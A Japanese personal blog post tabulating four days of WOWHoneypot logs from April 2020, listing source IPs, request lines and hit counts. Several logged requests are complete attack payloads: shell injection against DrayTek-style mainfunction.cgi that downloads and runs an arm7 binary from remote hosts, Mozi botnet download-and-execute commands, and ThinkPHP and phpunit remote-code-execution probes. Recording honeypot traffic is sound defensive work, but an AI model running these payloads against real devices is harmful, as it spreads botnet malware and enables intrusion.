家studyをつづって

IT技術に関することやセキュリティ、ガイドライン等学んだことをつづっていきます。

Wowhoneypotログ分析(2020/04/21-2020/04/24)

概要

以前の記事で構築したWowhoneypotのログを集計した結果です。

 

対象期間

2020/04/21-2020/04/24 

 

ログの集計

送信元 内容 検知数
    0
108.68.60.225 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
114.236.196.92 GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 1
121.32.151.178 POST /cgi-bin/mainfunction.cgi 1
125.227.178.164 GET /phpmyadmin/index.php?lang=en 1
125.235.13.66 GET /TP/public/index.php 1
  GET /TP/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars0]=phpinfo&vars1]]=1 1
  POST /TP/public/index.php?s=captcha 1
128.14.134.170 GET /Telerik.Web.UI.WebResource.axd?type=rau 1
131.108.37.14 POST /cgi-bin/mainfunction.cgi 1
161.35.68.124 GET /Temporary_Listen_Addresses/SMSSERVICE 1
161.35.68.208 GET /WSMAN 1
162.243.128.21 GET /portal/redlion 1
181.129.178.66 POST /cgi-bin/mainfunction.cgi 1
181.198.11.18 POST /cgi-bin/mainfunction.cgi 1
181.198.217.181 POST /cgi-bin/mainfunction.cgi 1
186.101.230.155 POST /cgi-bin/mainfunction.cgi 1
187.234.16.206 POST /cgi-bin/mainfunction.cgi 1
187.243.255.30 POST /cgi-bin/mainfunction.cgi 1
189.177.144.118 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
192.241.237.192 GET /hudson 1
202.102.90.226 GET /TP/public/index.php 1
211.38.144.230 GET /manager/html 1
217.165.166.213 POST /cgi-bin/mainfunction.cgi 2
37.99.254.196 POST /cgi-bin/mainfunction.cgi 3
45.13.93.82 CONNECT ip.ws.126.net:443 1
45.13.93.90 CONNECT ip.ws.126.net:443 1
45.146.253.35 GET /db/scripts/setup.php 3
  GET /myadmin/scripts/setup.php 5
  GET /mysql/scripts/setup.php 3
  GET /phpMyAdmin/scripts/setup.php 30
  GET /phpmyadmin2/scripts/setup.php 2
  GET /pma/scripts/setup.php 3
  GET /scripts/setup.php 2
  GET /sqladmin/scripts/setup.php 2
  GET /sqladmin/scripts/setup.php%20 1
  POST /phpMyAdmin/scripts/setup.php 23
45.232.36.18 POST /cgi-bin/mainfunction.cgi 1
49.70.188.136 GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws 1
5.101.0.209 GET /?a=fetch&content=<php>die(@md5(HelloThinkCMF))</php> 2
  GET /?XDEBUG_SESSION_START=phpstorm 2
  GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars0]=md5&vars1]]=HelloThinkPHP 2
  GET /solr/admin/info/system?wt=json 2
  GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2
  POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php 2
51.235.33.81 POST /cgi-bin/mainfunction.cgi 1
65.36.10.248 POST /boaform/admin/formPing 1
71.54.163.11 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://192.3.45.185/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
73.72.169.203 POST /cgi-bin/mainfunction.cgi 1
77.31.248.95 POST /cgi-bin/mainfunction.cgi?action=login&keyPath=%27%0A/bin/sh${IFS}-c${IFS}'cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}arm7;${IFS}busybox${IFS}wget${IFS}http://19ce033f.ngrok.io/arm7;${IFS}chmod${IFS}777${IFS}arm7;${IFS}./arm7'%0A%27&loginUser=a&loginPwd=a 1
80.82.78.104 POST /cgi-bin/mainfunction.cgi 1
81.192.103.47 GET /robots.txt 1
82.53.79.233 POST /cgi-bin/mainfunction.cgi 1
83.110.104.31 POST /cgi-bin/mainfunction.cgi 1
88.249.218.92 POST /cgi-bin/mainfunction.cgi 1
90.177.46.5 POST /boaform/admin/formPing 1
93.61.136.40 POST /boaform/admin/formPing 1

 

 

 

コメント